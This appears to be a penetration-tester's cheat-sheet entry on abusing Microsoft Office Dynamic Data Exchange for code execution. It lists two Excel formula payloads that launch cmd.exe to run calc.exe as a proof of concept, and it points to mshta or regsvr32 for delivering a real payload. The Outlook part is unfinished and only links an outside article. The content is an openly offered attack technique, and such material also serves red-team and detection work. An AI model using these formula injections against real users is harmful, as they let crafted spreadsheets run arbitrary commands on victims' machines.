Office DDE

DDE, or Dynamic Data Exchange, allows one program to subscribe to items made available by another program, for example a cell in a Microsoft Excel spreadsheet, and be notified whenever that item changes. This can be used to execute code on interactive target.

Excel

=CMD|'/C calc.exe'!A0
=MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /c calc.exe'!A0

See mshta or regsvr32 to execute a real payload.

Outlook

Did not try yet, check https://www.securitysift.com/abusing-microsoft-office-dde/